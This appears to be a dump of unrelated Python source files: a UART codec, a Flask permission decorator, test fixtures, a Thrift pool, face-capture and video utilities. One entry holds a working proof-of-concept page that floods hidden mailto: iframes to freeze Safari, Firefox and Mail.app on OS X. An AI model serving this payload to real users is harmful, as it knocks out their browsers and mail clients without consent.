    # data: the raw data to be unpacked (frame format: 0xddff is_cmd len data crc16 0xaaff)
    # return: list of (is_cmd, payload) tuples
    def unpack_data(self, data, size):
        data = bytearray(data)
        ra = size - 4
        ret = []
        for i in range(ra):
            try:
                (head, is_cmd, length) = ustruct.unpack('>HBH', data[i:i + 5])
                if head == 0xddff:  # check head
                    try:
                        fmt = '>' + str(length) + 'sHH'
                        (s, crc, end) = ustruct.unpack(fmt, data[i + 5:])
                        if s is not None:
                            crc_check = self.crc16(s)
                            if crc == crc_check:
                                ret.append((is_cmd, s))
                            else:
                                print("receive crc check failed: ", data)
                                continue
                    except:
                        continue
            except:
                continue
        return ret

    def read(self):
        read_data = self.uart.read()
        if read_data:
            udatas = self.unpack_data(read_data, len(read_data))
            return udatas

    def write(self, s, is_cmd=0):
        s = self.pack_data(s, is_cmd)
        return self.uart.write(s)

    # execute cmd
    # cmd: string
    def exec_cmd(self, cmd):
        hcmd = hash(cmd)
        try:
            args = self.args[hcmd]
            try:
                self.orders[hcmd](*args)  # execute the cmd function
            except:
                print("can't find cmd: ", cmd)
        except KeyError:
            try:
                self.orders[hcmd]()  # execute the cmd function
            except:
                print("can't find cmd: ", cmd)

    def bytes_to_nums(self, b):
        ret = []
        i = 0
        while i < len(b):
            try:
                t = ustruct.unpack('>s', b[i:i + 1])  # type tag
                t = t[0].decode('utf-8')
                fmt = '>' + t
                try:
                    num = ustruct.unpack(fmt, b[i + 1:])
                    ret.append(num[0])
                    i = i + 1 + ustruct.calcsize(str(t))
                except:
                    i = i + 1
            except:
                i = i + 1
        return ret

    # fl: uint8_t(B), int8_t(b), uint16_t(H), int16_t(h), uint32_t(I), int32_t(i), double(d), str(s)
    def pack_num(self, n, fl):
        return ustruct.pack(">s" + fl, fl, n)

    # read data, parse into cmds/values and execute
    def parse(self, udatas):
        ret = []
        if udatas:
            for udata in udatas:
                is_cmd = udata[0]
                if udata[0]:  # cmd
                    self.exec_cmd(udata[1])
                else:  # data
                    nums = self.bytes_to_nums(udata[1])
                    if len(nums) > 0:
                        ret.append(nums)  # numbers
                    try:
                        s = udata[1].decode('utf-8')  # string
                        ret.append(s)
                    except:
                        pass
        return ret
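# Hedged usage sketch (an addition, not part of the original driver): it
# assumes a MicroPython-style board where machine.UART exists; any object
# exposing blocking read()/write() would also work.
if __name__ == "__main__":
    from machine import UART  # illustrative wiring only
    trans = UartTrans(UART(1, 115200))
    trans.reg_cmd("led_on", print, "LED ON")  # register a command handler
    trans.write(b"hello", is_cmd=0)           # send a data frame
    print(trans.parse(trans.read()))          # decode and dispatch incoming frames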
11588661
from functools import wraps

from flask import request, jsonify, g, current_app

from app.models import db, User
from app.utils.map_perm import mapPerm


def auth(app_id=None, t=None, path=None, method=None):
    # These are passed in explicitly so the check can also serve as an
    # authorization service for other integrated systems.
    TOKEN = t
    APP_ID = app_id
    PATH = path
    METHOD = method
    try:
        user = User.verify_auth_token(TOKEN)
        g.user = user
    except Exception:
        return False
    finally:
        db.session.commit()
    # APP_ID 1 is the PMS system itself; user.id 1 is the PMS administrator.
    if APP_ID == 1 and user.id == 1:
        return True
    groups = user.groups
    for group in groups:
        if group.app_id == APP_ID:
            permissions = group.permissions
            for perm in permissions:
                if perm.resource.resource_type == 'url' and perm.resource.resource_code.get("url") == PATH:
                    res = mapPerm.auth_method(METHOD, perm.action)
                    print(user.username, perm.resource.resource_name, perm.resource.resource_code, res)
                    return res
    return False


def authenticate(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        """
        Check whether the user may access the URL:
        1. Get the current request method and URL.
        2. From the user's groups under the current system, collect the
           resource_codes of the permissions they hold.
        3. Verify that the action of the resource whose resource_code equals
           the requested URL includes the request method.
        """
        token = None
        if 'X-Token' in request.headers:
            token = request.headers['X-Token']
        acct = auth(current_app.config['APP_ID'], token, request.path, request.method)
        if acct:
            return func(*args, **kwargs)
        return jsonify({"code": 40000, "message": "无权访问"})  # "access denied"
    return wrapper
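# Hedged usage sketch (an addition): a route guarded by the decorator above.
# It assumes the Blueprint is registered on the app elsewhere, as is typical
# in this kind of project layout; the route path is illustrative.
from flask import Blueprint

bp = Blueprint("demo", __name__)


@bp.route("/api/secret", methods=["GET"])
@authenticate
def secret():
    return jsonify({"code": 20000, "data": "only for authorized users"})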
11588696
import chex
import jax
import jax.numpy as jnp

import shinrl as srl


def test_squashed_normal():
    loc = jnp.array([0.1, 0.5, 0.2])
    scale = jnp.array([1.0, 5.0, 10.0])
    dist = srl.SquashedNormal(loc, scale)
    sample = dist.sample(seed=jax.random.PRNGKey(0), sample_shape=10)
    log_prob = dist.log_prob(sample)
    chex.assert_shape(log_prob, (10, 3))
11588707
description = '''This bug will freeze Safari, and Safari/Firefox + Mail.app, on OS X
by sending a large amount of data to the mailto: URI scheme. It only works if the
user has at least one mailbox set up.'''

code = '''
<!DOCTYPE html>
<html>
<head>
    <script src="//code.jquery.com/jquery-1.12.0.min.js"></script>
    <script src="//code.jquery.com/jquery-migrate-1.2.1.min.js"></script>
</head>
<script type="text/javascript">
    var extraData = "";
    for (itxextraData = 0; itxextraData < 50000; itxextraData++) {
        extraData = extraData + "%20%20%20%20%20%20%20%20%20%20";
    }
    for (itxIframeFlood = 0; itxIframeFlood < 1000; itxIframeFlood++) {
        jQuery('#result').append('<iframe style="visibility:hidden;" src="mailto:?cci=' + extraData + '&cc=' + extraData + '&subject=' + extraData + '&body=' + extraData + '&' + extraData + '"></iframe>');
    }
</script>
</html>'''
11588716
import pyecharts.options as opts
from pyecharts.charts import Pie

x_data = ["微博", "知乎", "中国台湾网", "环球网", "日报网",
          "中新网", "今日头条", "光明网", "凤凰网", "新华网"]
y_data = [5401, 157, 5035, 3245, 4296, 5574, 1891, 3131, 1052, 1997]
data_pair = [list(z) for z in zip(x_data, y_data)]
data_pair.sort(key=lambda x: x[1])


def terrace_pie():
    c = (
        Pie(init_opts=opts.InitOpts(bg_color="#2c343c"))
        .add(
            series_name="访问来源",
            data_pair=data_pair,
            rosetype="radius",
            radius="55%",
            center=["50%", "50%"],
            label_opts=opts.LabelOpts(is_show=False, position="center"),
        )
        .set_global_opts(
            title_opts=opts.TitleOpts(
                title="2020年台海局势各平台占比情况",
                pos_left="center",
                pos_top="20",
                title_textstyle_opts=opts.TextStyleOpts(color="#fff"),
            ),
            legend_opts=opts.LegendOpts(is_show=False),
        )
        .set_series_opts(
            tooltip_opts=opts.TooltipOpts(
                trigger="item", formatter="{a} <br/>{b}: {c} ({d}%)"
            ),
            label_opts=opts.LabelOpts(color="rgba(255, 255, 255, 0.3)"),
        )
        .render("./templates/2020年台海局势各平台占比情况图.html")
    )


if __name__ == '__main__':
    terrace_pie()
11588755
import os

import flask

flask.cli.load_dotenv()
os.environ["DATABASE_URL"] = "sqlite:///:memory:"

import pytest

from offstream import db
from offstream.app import app


@pytest.fixture
def setup_db():
    db.Base.metadata.create_all(db.engine)
    yield
    db.Base.metadata.drop_all(db.engine)


@pytest.fixture
def session():
    with db.Session() as session:
        yield session


@pytest.fixture
def client(setup_db):
    app.testing = True
    with app.test_client() as client:
        yield client


@pytest.fixture
def runner(setup_db):
    return app.test_cli_runner()


@pytest.fixture
def settings(session):
    settings, password = db.settings(ping_url="https://example.org/")
    session.add(settings)
    session.commit()
    return settings, password


@pytest.fixture
def auth(settings):
    settings_, password = settings
    return settings_.username, password


@pytest.fixture
def streamer(session, setup_db):
    streamer_ = db.Streamer(name="x")
    session.add(streamer_)
    session.commit()
    return streamer_


@pytest.fixture
def stream(streamer, session):
    stream_ = db.Stream(url="https://example.org/", streamer=streamer)
    session.add(stream_)
    session.commit()
    return stream_


@pytest.fixture(params=[None, ("offstream", ""), ("offstream", "wrong")])
def bad_auth(request):
    return request.param


@pytest.fixture
def m3u8(tmpdir):
    return tmpdir / "playlist.m3u8"
11588788
from thrift.transport import TTransport
from thrift.transport import TSocket
from thrift.protocol import TBinaryProtocol


# Thrift connection pool
class ConnectionPool(object):
    DEFAULT_NETWORK_TIMEOUT = 0
    DEFAULT_POOL_SIZE = 100

    def __init__(self, host, port, iface_cls, size=DEFAULT_POOL_SIZE,
                 async_mode=False, network_timeout=DEFAULT_NETWORK_TIMEOUT):
        # async_mode: use gevent queues/locks instead of threading primitives
        self.host = host
        self.port = port
        self.iface_cls = iface_cls
        self.network_timeout = network_timeout
        self.size = size
        self._closed = False
        self._async = async_mode
        if self._async:
            import gevent.queue
            try:
                from gevent import lock as glock
            except ImportError:
                # gevent < 1.0
                from gevent import coros as glock
            self._semaphore = glock.BoundedSemaphore(size)
            self._connection_queue = gevent.queue.LifoQueue(size)
            self._QueueEmpty = gevent.queue.Empty
        else:
            import threading
            import queue
            self._semaphore = threading.BoundedSemaphore(size)
            self._connection_queue = queue.LifoQueue(size)
            self._QueueEmpty = queue.Empty

    def close(self):
        self._closed = True
        while not self._connection_queue.empty():
            try:
                conn = self._connection_queue.get(block=False)
                try:
                    self._close_thrift_connection(conn)
                except Exception:
                    pass
            except self._QueueEmpty:
                pass

    def _create_thrift_connection(self):
        socket = TSocket.TSocket(self.host, self.port)
        if self.network_timeout > 0:
            socket.setTimeout(self.network_timeout)
        transport = TTransport.TBufferedTransport(socket)
        protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
        connection = self.iface_cls(protocol)
        transport.open()
        return connection

    def _close_thrift_connection(self, conn):
        try:
            conn._iprot.trans.close()
        except Exception:
            print('warn: failed to close iprot trans on', conn)
        try:
            conn._oprot.trans.close()
        except Exception:
            print('warn: failed to close oprot trans on', conn)

    def get_connection(self):
        """Get a connection from the pool. This blocks until one is available."""
        self._semaphore.acquire()
        if self._closed:
            raise RuntimeError('connection pool closed')
        try:
            return self._connection_queue.get(block=False)
        except self._QueueEmpty:
            try:
                return self._create_thrift_connection()
            except Exception:
                self._semaphore.release()
                raise

    def return_connection(self, conn):
        """Return a thrift connection to the pool."""
        if self._closed:
            self._close_thrift_connection(conn)
            return
        self._connection_queue.put(conn)
        self._semaphore.release()

    def release_conn(self, conn):
        """Call this when the connection is no longer usable."""
        try:
            self._close_thrift_connection(conn)
        except Exception:
            pass
        if not self._closed:
            self._semaphore.release()
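# Hedged usage sketch (an addition): 'MyService' stands in for any
# thrift-generated service module, and the host/port are illustrative.
if __name__ == '__main__':
    from myservice_thrift import MyService  # hypothetical generated module
    pool = ConnectionPool('127.0.0.1', 9090, MyService.Client, size=10)
    conn = pool.get_connection()
    try:
        conn.ping()                   # any RPC defined by the service
        pool.return_connection(conn)  # healthy connections go back to the pool
    except Exception:
        pool.release_conn(conn)       # broken connections are closed, not reused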
11588825
import os.path
import pickle
import glob

import pytest

from cjio import cityjson

# ------------------------------------ add option for running the full test set
def pytest_addoption(parser):
    parser.addoption("--balazs", action="store_true", default=False,
                     help="run tests against Balázs' local data")


def pytest_collection_modifyitems(config, items):
    if config.getoption("--balazs"):
        return
    skip_balazs = pytest.mark.skip(reason="need --balazs option to run")
    for item in items:
        if "balazs" in item.keywords:
            item.add_marker(skip_balazs)


@pytest.fixture(scope='session')
def data_dir():
    package_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
    yield os.path.join(package_dir, 'tests', 'data')


@pytest.fixture(scope='session')
def data_output_dir():
    package_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
    d = os.path.join(package_dir, "tmp")
    os.makedirs(d, exist_ok=True)
    yield d


@pytest.fixture(scope='session')
def delft(data_dir):
    p = os.path.join(data_dir, 'delft.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def delft_path(data_dir):
    p = os.path.join(data_dir, 'delft.json')
    yield p


@pytest.fixture(scope='session')
def delft_1b(data_dir):
    p = os.path.join(data_dir, 'delft_1b.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def rotterdam_subset(data_dir):
    p = os.path.join(data_dir, 'rotterdam', 'rotterdam_subset.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def rotterdam_subset_path(data_dir):
    p = os.path.join(data_dir, 'rotterdam', 'rotterdam_subset.json')
    yield p


@pytest.fixture(scope='session')
def zurich_subset(data_dir):
    p = os.path.join(data_dir, 'zurich', 'zurich_subset_lod2.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def zurich_subset_path(data_dir):
    p = os.path.join(data_dir, 'zurich', 'zurich_subset_lod2.json')
    yield p


@pytest.mark.balazs
@pytest.fixture(scope='function')
def ms_triangles(data_dir):
    """Long list of triangulated MultiSurfaces with EPSG:7514 coordinates."""
    p = os.path.join(data_dir, 'multisurface_triangulated.pickle')
    with open(p, 'rb') as fo:
        yield pickle.load(fo)


@pytest.fixture(scope='session')
def dummy(data_dir):
    p = os.path.join(data_dir, 'dummy', 'dummy.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def dummy_noappearance(data_dir):
    p = os.path.join(data_dir, 'dummy', 'dummy_noappearance.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def cube(data_dir):
    p = os.path.join(data_dir, 'cube.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def cube_compressed(data_dir):
    p = os.path.join(data_dir, 'cube.c.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def minimal(data_dir):
    p = os.path.join(data_dir, 'minimal.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def rectangle(data_dir):
    p = os.path.join(data_dir, 'dummy', 'rectangle.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def multi_lod(data_dir):
    p = os.path.join(data_dir, 'multi_lod.json')
    with open(p, 'r') as f:
        yield cityjson.CityJSON(file=f)


@pytest.fixture(scope='session')
def multi_lod_path(data_dir):
    p = os.path.join(data_dir, 'multi_lod.json')
    yield p


@pytest.fixture(scope='session')
def vertices():
    yield [
        (0.0, 1.0, 0.0),
        (1.0, 1.0, 0.0),
        (2.0, 1.0, 0.0),
        (3.0, 1.0, 0.0),
        (4.0, 1.0, 0.0),
        (5.0, 1.0, 0.0)
    ]


@pytest.fixture(scope='session')
def materials(data_dir):
    p1 = os.path.join(data_dir, 'material', 'mt-1.json')
    p2 = os.path.join(data_dir, 'material', 'mt-2.json')
    p3 = os.path.join(data_dir, 'dummy', 'composite_solid_with_material.json')
    p4 = os.path.join(data_dir, 'dummy', 'dummy.json')
    p5 = os.path.join(data_dir, 'dummy', 'multisurface_with_material.json')
    cj = []
    for p in (p1, p2, p3, p4, p5):
        with open(p, 'r') as f:
            cj.append(cityjson.CityJSON(file=f))
    return cj


@pytest.fixture(scope='session')
def triangulated(data_dir):
    p1 = os.path.join(data_dir, 'material', 'mt-1-triangulated.json')
    p2 = os.path.join(data_dir, 'material', 'mt-2-triangulated.json')
    p3 = os.path.join(data_dir, 'dummy', 'dummy-triangulated.json')
    cj = []
    for p in (p1, p2, p3):
        with open(p, 'r') as f:
            cj.append(cityjson.CityJSON(file=f))
    return cj


@pytest.fixture(scope='session')
def mt_1_path(data_dir):
    return os.path.join(data_dir, 'material', 'mt-1.json')
11588828
import sys
import traceback
import threading

if sys.version_info[0] < 3:
    import Queue as queue
else:
    import queue

from yaku.task_manager import run_task, order_tasks, TaskManager
from yaku.utils import get_exception
import yaku.errors


def run_tasks(ctx, tasks=None):
    if tasks is None:
        tasks = ctx.tasks
    task_manager = TaskManager(tasks)
    s = SerialRunner(ctx, task_manager)
    s.start()
    s.run()


def run_tasks_parallel(ctx, tasks=None, maxjobs=1):
    if tasks is None:
        tasks = ctx.tasks
    task_manager = TaskManager(tasks)
    r = ParallelRunner(ctx, task_manager, maxjobs)
    r.start()
    r.run()


class SerialRunner(object):
    def __init__(self, ctx, task_manager):
        self.ctx = ctx
        self.task_manager = task_manager

    def start(self):
        # Dummy, to give the same interface as ParallelRunner
        pass

    def run(self):
        grp = self.task_manager.next_set()
        while grp:
            for task in grp:
                run_task(self.ctx, task)
            grp = self.task_manager.next_set()


class ParallelRunner(object):
    def __init__(self, ctx, task_manager, maxjobs=1):
        self.njobs = maxjobs
        self.task_manager = task_manager
        self.ctx = ctx
        self.worker_queue = queue.Queue()
        self.error_out = queue.Queue()
        self.failure_lock = threading.Lock()
        self.stop = False

    def start(self):
        def _worker():
            # XXX: this whole thing is a hack - find a better way to
            # notify task execution failure to all worker threads
            while not self.stop:
                task = self.worker_queue.get()
                try:
                    run_task(self.ctx, task)
                except yaku.errors.TaskRunFailure:
                    e = get_exception()
                    self.failure_lock.acquire()
                    self.stop = True
                    self.failure_lock.release()
                    task.error_msg = e.explain
                    task.error_cmd = e.cmd
                    self.error_out.put(task)
                except Exception:
                    e = get_exception()
                    exc_type, exc_value, tb = sys.exc_info()
                    lines = traceback.format_exception(exc_type, exc_value, tb)
                    self.failure_lock.acquire()
                    self.stop = True
                    self.failure_lock.release()
                    task.error_msg = "".join(lines)
                    task.error_cmd = []
                    self.error_out.put(task)
                self.worker_queue.task_done()

        for i in range(self.njobs):
            t = threading.Thread(target=_worker)
            t.setDaemon(True)
            t.start()

    def run(self):
        grp = self.task_manager.next_set()
        while grp:
            for task in grp:
                self.worker_queue.put(task)
            # XXX: we only join once we detect the worker queue to be empty, to
            # avoid blocking for a long time. This is naive, and will break if
            # the worker_queue is filled after this point
            while not self.stop:
                if self.worker_queue.empty():
                    self.worker_queue.join()
                    break
            if not self.error_out.empty():
                task = self.error_out.get()
                msg = task.error_msg
                cmd = task.error_cmd
                raise yaku.errors.TaskRunFailure(cmd, msg)
            grp = self.task_manager.next_set()
11588845
from functools import partial
from typing import Any, Dict

import pytest
from pydantic import ValidationError

from tests.utils.asserts import assert_validation_error
from todolist.core.accounts.entities.user import Credentials

DataType = Dict[str, Any]


@pytest.fixture(name="valid_data")
def valid_data_fixture() -> DataType:
    return {
        "email": "<EMAIL>",
        "password": "<PASSWORD>",
    }


@pytest.fixture(name="invalid_data")
def invalid_data_fixture() -> DataType:
    return {
        "email": "some email",
        "password_hash": ["<PASSWORD>"],
    }


@pytest.mark.unit
class TestCredentials:
    class TestModel:
        def test_validation(self, valid_data):
            assert Credentials(**valid_data)

        def test_invalidation(self, invalid_data):
            with pytest.raises(ValidationError):
                assert Credentials(**invalid_data)

        def test_immutability(self, valid_data):
            entity = Credentials(**valid_data)
            for key in entity.dict().keys():
                with pytest.raises(TypeError):
                    setattr(entity, key, "some value")

    class TestEmail:
        assert_validation_error = partial(assert_validation_error, 1, "email")

        def test_must_be_email(self, valid_data):
            with pytest.raises(ValidationError) as excinfo:
                valid_data.update({"email": ["some string"]})
                Credentials(**valid_data)

            self.assert_validation_error("type_error.str", excinfo)

        def test_is_required(self, valid_data):
            with pytest.raises(ValidationError) as excinfo:
                valid_data.pop("email")
                Credentials(**valid_data)

            self.assert_validation_error("value_error.missing", excinfo)

    class TestPassword:
        assert_validation_error = partial(assert_validation_error, 1, "password")

        def test_must_be_secret_str(self, valid_data):
            with pytest.raises(ValidationError) as excinfo:
                valid_data.update({"password": ["<PASSWORD>"]})
                Credentials(**valid_data)

            self.assert_validation_error("type_error.str", excinfo)

        def test_is_required(self, valid_data):
            with pytest.raises(ValidationError) as excinfo:
                valid_data.pop("password")
                Credentials(**valid_data)

            self.assert_validation_error("value_error.missing", excinfo)

        def test_min_length_gte_8(self, valid_data):
            with pytest.raises(ValidationError) as excinfo:
                valid_data.update({"password": "a" * 7})
                Credentials(**valid_data)

            self.assert_validation_error("value_error.any_str.min_length", excinfo)

        def test_max_length_lte_128(self, valid_data):
            with pytest.raises(ValidationError) as excinfo:
                valid_data.update({"password": "a" * 129})
                Credentials(**valid_data)

            self.assert_validation_error("value_error.any_str.max_length", excinfo)
11588853
from multiprocessing.reduction import ForkingPickler

import quiver


def rebuild_feature(ipc_handle):
    feature = quiver.Feature.lazy_from_ipc_handle(ipc_handle)
    return feature


def reduce_feature(feature):
    ipc_handle = feature.share_ipc()
    return (rebuild_feature, (ipc_handle, ))


def rebuild_pyg_sampler(cls, ipc_handle):
    sampler = cls.lazy_from_ipc_handle(ipc_handle)
    return sampler


def reduce_pyg_sampler(sampler):
    ipc_handle = sampler.share_ipc()
    return (rebuild_pyg_sampler, (type(sampler), ipc_handle, ))


def init_reductions():
    ForkingPickler.register(quiver.Feature, reduce_feature)
    ForkingPickler.register(quiver.pyg.GraphSageSampler, reduce_pyg_sampler)
    ForkingPickler.register(quiver.pyg.MixedGraphSageSampler, reduce_pyg_sampler)
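# Hedged usage note (an addition): the registrations must happen in the parent
# process before workers are spawned, so Feature/sampler objects cross process
# boundaries as IPC handles instead of full copies. 'worker_fn' and
# 'world_size' below are placeholders, not names from this module.
if __name__ == '__main__':
    import torch.multiprocessing as mp
    init_reductions()
    # mp.spawn(worker_fn, args=(feature, sampler), nprocs=world_size)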
11588895
from .._tier0 import execute
from .._tier0 import plugin_function
from .._tier0 import Image


@plugin_function(categories=['filter', 'in assistant'])
def maximum_image_and_scalar(source: Image, destination: Image = None, scalar: float = 0):
    """Computes the maximum of a constant scalar s and each pixel value x in a given image X.

    <pre>f(x, s) = max(x, s)</pre>

    Parameters
    ----------
    source : Image
    destination : Image
    scalar : Number

    Returns
    -------
    destination

    Examples
    --------
    >>> import pyclesperanto_prototype as cle
    >>> cle.maximum_image_and_scalar(source, destination, scalar)

    References
    ----------
    .. [1] https://clij.github.io/clij2-docs/reference_maximumImageAndScalar
    """
    parameters = {
        "src": source,
        "dst": destination,
        "valueB": float(scalar)
    }

    execute(__file__,
            '../clij-opencl-kernels/kernels/maximum_image_and_scalar_' + str(len(destination.shape)) + 'd_x.cl',
            'maximum_image_and_scalar_' + str(len(destination.shape)) + 'd',
            destination.shape,
            parameters)
    return destination
11588996
import cv2
import numpy as np
import os

# Read a video stream, detect faces and collect training samples

# Camera object
cam = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')

face_data = []
cnt = 0
user_name = input("enter your name")

while True:
    ret, frame = cam.read()
    if ret == False:
        print("Something Went Wrong!")
        continue

    key_pressed = cv2.waitKey(1) & 0xFF  # bitmasking to get the last 8 bits
    if key_pressed == ord('q'):  # ord --> ASCII value (8 bit)
        break

    faces = face_cascade.detectMultiScale(frame, 1.3, 5)
    # print(faces)
    if len(faces) == 0:
        cv2.imshow("Video", frame)
        continue

    for face in faces:
        x, y, w, h = face
        face_section = frame[y - 10:y + h + 10, x - 10:x + w + 10]
        face_section = cv2.resize(face_section, (100, 100))
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 255), 2)
        if cnt % 10 == 0:  # keep every 10th detection as a sample
            print("Taking picture ", int(cnt / 10))
            face_data.append(face_section)
        cnt += 1

    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    cv2.imshow("Video", frame)
    cv2.imshow("Video Gray", face_section)

# Save the face data in a numpy file
print("Total Faces", len(face_data))
face_data = np.array(face_data)
face_data = face_data.reshape((face_data.shape[0], -1))
np.save("FaceData/" + user_name + ".npy", face_data)
print("Saved at FaceData/" + user_name + ".npy")
print(face_data.shape)

cam.release()
cv2.destroyAllWindows()
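# Hedged follow-up sketch (an addition): reload the saved samples and restore
# their 100x100x3 image shape for later training or recognition.
loaded = np.load("FaceData/" + user_name + ".npy")
print(loaded.shape)                        # (num_samples, 30000)
faces = loaded.reshape((-1, 100, 100, 3))  # back to BGR image stacks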
11589012
from functools import wraps

import numpy

from theano import scalar as scal, Constant
from theano.gof import local_optimizer
from theano.tensor import (DimShuffle, get_scalar_constant_value,
                           NotScalarConstantError)

from theano.sandbox.cuda.basic_ops import (GpuFromHost, HostFromGpu,
                                           host_from_gpu, GpuDimShuffle,
                                           GpuElemwise)

_one = scal.constant(numpy.asarray(1.0, dtype='float32'))


def grab_cpu_scalar(v, nd):
    if v.owner is not None:
        n = v.owner
        if (isinstance(n.op, GpuDimShuffle) and
                n.op.new_order == ('x',) * nd):
            return host_from_gpu(n.inputs[0])
        elif (isinstance(n.op, DimShuffle) and
              n.op.new_order == ('x',) * nd):
            return n.inputs[0]
        elif isinstance(n.op, GpuFromHost):
            return grab_cpu_scalar(n.inputs[0], nd=nd)
        else:
            return None
    else:
        if (isinstance(v, Constant) and
                v.broadcastable == (True,) * nd):
            return v.dimshuffle(())


def find_node(v, cls, ignore_clients=False):
    # This digs through possibly redundant transfers to find the node
    # that has the op class specified.
    if v.owner is not None and (ignore_clients or len(v.clients) == 1):
        if isinstance(v.owner.op, cls):
            return v.owner
        elif (isinstance(v.owner.op, GpuFromHost) and
              v.owner.inputs[0].owner is not None and
              (ignore_clients or len(v.owner.inputs[0].clients) == 1) and
              isinstance(v.owner.inputs[0].owner.op, HostFromGpu)):
            return find_node(v.owner.inputs[0].owner.inputs[0], cls)
        else:
            return None


def is_equal(var, val):
    # Returns True if var is always equal to val (python value), False
    # otherwise (including if var is not constant)
    try:
        v = get_scalar_constant_value(var)
        return v == val
    except NotScalarConstantError:
        return False


def alpha_merge(cls, alpha_in, beta_in):
    def wrapper(maker):
        @local_optimizer([GpuElemwise])
        @wraps(maker)
        def opt(node):
            if (isinstance(node.op, GpuElemwise) and
                    node.op.scalar_op == scal.mul and
                    node.nin == 2):
                targ = find_node(node.inputs[0], cls)
                if targ is None:
                    targ = find_node(node.inputs[1], cls)
                    if targ is None:
                        return
                    lr = grab_cpu_scalar(node.inputs[0],
                                         nd=targ.outputs[0].ndim)
                else:
                    lr = grab_cpu_scalar(node.inputs[1],
                                         nd=targ.outputs[0].ndim)
                if lr is None or targ is None:
                    return None
                inputs = list(targ.inputs)
                try:
                    c = get_scalar_constant_value(lr)
                    if c == 0:
                        inputs[alpha_in] = lr
                        inputs[beta_in] = lr
                    elif c == 1:
                        inputs[alpha_in] = targ.inputs[alpha_in]
                        inputs[beta_in] = targ.inputs[beta_in]
                    else:
                        inputs[alpha_in] = lr * targ.inputs[alpha_in]
                        inputs[beta_in] = lr * targ.inputs[beta_in]
                except NotScalarConstantError:
                    inputs[alpha_in] = lr * targ.inputs[alpha_in]
                    inputs[beta_in] = lr * targ.inputs[beta_in]
                return maker(targ, *inputs)
        return opt
    return wrapper


def output_merge(cls, alpha_in, beta_in, out_in):
    def wrapper(maker):
        @local_optimizer([GpuElemwise])
        @wraps(maker)
        def opt(node):
            if (isinstance(node.op, GpuElemwise) and
                    node.op.scalar_op == scal.add and
                    node.nin == 2):
                targ = find_node(node.inputs[0], cls)
                W = node.inputs[1]
                if targ is None:
                    targ = find_node(node.inputs[1], cls)
                    W = node.inputs[0]
                if targ is None:
                    return None
                if not is_equal(targ.inputs[beta_in], 0.0):
                    # other cases are too complex for now
                    return None
                if W.broadcastable != targ.inputs[out_in].broadcastable:
                    # May change later to do the broadcast, but it's
                    # under discussion.
                    return None
                inputs = list(targ.inputs)
                inputs[out_in] = W
                inputs[beta_in] = _one.clone()
                return maker(targ, *inputs)
        return opt
    return wrapper
11589017
import cv2
import numpy as np
import os
from tqdm import tqdm
from skimage.measure import compare_ssim as ssim
import pytorch_ssim
import torch
from torch.autograd import Variable

'''
This util file is for anything related to video processing that can be
factored out into here.
'''


def get_frames_clusters_from_video(video_path, cluster_size=425):
    '''
    Given a video path, read the video, store every cluster_size frames in an
    array, add it to a list and return the list.
    '''
    # Playing video from file:
    frameClustersArray = []
    cluster = []
    cap = cv2.VideoCapture(video_path)

    while True:
        # Capture frame-by-frame
        ret, frame = cap.read()

        # Break if no image is returned (we have reached the end of the video)
        if frame is None or ret is False:
            break

        # Add frame to array
        cluster.append(frame)

        # If the cluster has reached cluster_size, break it off
        if len(cluster) == cluster_size:
            frameClustersArray.append(list(cluster))
            cluster.clear()

    # Append any residual frames
    if len(cluster) > 0:
        frameClustersArray.append(list(cluster))
        cluster.clear()

    # When everything is done, release the capture
    cap.release()
    cv2.destroyAllWindows()
    return frameClustersArray


def export_video_frames(frames, output_path):
    '''
    Given an array of frames extracted from a video, write these frames to an
    output directory.
    '''
    if output_path != None:
        try:
            if not os.path.exists(output_path):
                os.makedirs(output_path)
        except OSError:
            print('Error: Creating directory of ' + output_path)

    print('Writing frames to ' + output_path)
    currentFrame = 0
    for frame in tqdm(frames):
        # Saves an image of the current frame as a jpg file
        name = output_path + 'frame' + str(currentFrame) + '.jpg'
        # Write frame to directory
        cv2.imwrite(name, frame)
        # To stop duplicate images
        currentFrame += 1
    print("Done!")


def group_semantic_frames(frames, threshold=None):
    '''
    Given an array of frames extracted from a video, break these into subarrays
    of semantically similar frames. For now, use the Structural Similarity
    Index and break off a group once the score drops below a certain threshold.
    Return an array of these subarrays.
    '''
    frame_clusters = []
    group = []
    print("Grouping semantic frames")
    for frame in tqdm(frames):
        if len(group) == 0:
            group.append(frame)
        else:
            # compute the structural similarity index between the current
            # image and the oldest image in the frame group
            s = 0.0
            if torch.cuda.is_available():
                threshold = .28
                img1 = torch.from_numpy(np.rollaxis(group[0], 2)).float().unsqueeze(0) / 255.0
                img2 = torch.from_numpy(np.rollaxis(frame, 2)).float().unsqueeze(0) / 255.0
                img1 = img1.cuda()
                img2 = img2.cuda()
                img1 = Variable(img1, requires_grad=False)
                img2 = Variable(img2, requires_grad=True)
                s = pytorch_ssim.ssim(img1, img2)
                s = s.cpu().data.numpy()
            else:
                threshold = 0.35
                s = ssim(group[0], frame, multichannel=True)
            if s < threshold:
                frame_clusters.append(list(group))
                group.clear()
            # TODO: If we don't append the frame each time, we only get the
            # salient images, which reduces the number of frames
            group.append(frame)
    if len(group) > 0:
        frame_clusters.append(list(group))
    return frame_clusters
